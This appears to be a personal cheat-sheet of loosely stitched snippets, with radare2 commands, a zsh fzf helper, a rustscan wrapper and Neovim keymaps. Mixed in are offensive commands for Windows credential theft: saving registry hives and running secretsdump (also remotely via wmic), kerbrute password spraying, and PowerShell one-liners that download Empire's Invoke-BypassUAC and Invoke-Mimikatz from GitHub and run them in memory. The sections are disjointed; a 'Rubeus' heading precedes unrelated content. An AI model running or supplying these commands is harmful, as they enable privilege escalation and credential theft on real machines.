- load without any analysis (file header at offset 0x0): r2 -n /path/to/file
- analyze all: aa
- show sections: iS
- list functions: afl
- list imports: ii
- list entrypoints: ie
- seek to function: s sym.main

```python
import csv
import argparse
import os
parser = argparse.ArgumentParser()
parser.add_argument('number', type=str)
parser.add_argument('-o', type=str, help='Output folder for files')
args = parser.parse_args()
ports = args.number.split(',')
```
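
```zsh
# Search notes in ~/obsidian for lines starting with the given prefix,
# pick one with fzf, and push it onto the zsh command line (print -z).
cmd () {
  arg=${1}
  # Quote the pattern so zsh does not treat ^ as a glob operator
  print -z -- $(rg "^${arg}" ~/obsidian/ | sed 's/^[^:]*://' | fzf )
}
```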

```bash
#!/bin/bash
# Check if the correct number of arguments is provided
if [ "$#" -ne 2 ]; then
  echo "Usage: $0 <target_host> <output_folder>"
  exit 1
fi
# Replace 'localhost' with the target host parameter
rustscan -a "$1" -g | sed 's/.*\[\(.*\)\].*/\1/' | xargs python3 ~/python/portidentify.py -o "$2"
```

```
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py
#Do this remotely
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"
```

With kerbrute.py:

```
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
```

With Rubeus version with brute module:

```
[+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
#Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
#Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
#Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
```

```lua
vim.keymap.set({ 'n', 'v' }, '<Space>', '<Nop>', { silent = true })
vim.keymap.set({ 'n', 'v' }, '<C-s>', ':w<enter>', { silent = true })
vim.keymap.set({ 'n', 'v' }, '<leader>rr', ':w<enter>:!python3 %<enter>', { silent = true , desc = 'Run Python file'})
vim.keymap.set({ 'n', 'v' }, '<C-d>', '<C-d>zz', { silent = true })
vim.keymap.set({ 'n', 'v' }, '<C-u>', '<C-u>zz', { silent = true })
vim.keymap.set('n', '<leader>qq', ':q!<enter>', { silent = true })
vim.keymap.set('n', 'n', 'nzz', { silent = true })
vim.keymap.set('n', 'N', 'Nzz', { silent = true })
vim.keymap.set('n', '*', '*zz', { silent = true })
vim.keymap.set('n', '<S-h>', ':bprevious<enter>', { silent = true })
```

```sh
sort -t . -k 3,3n -k 4,4n
```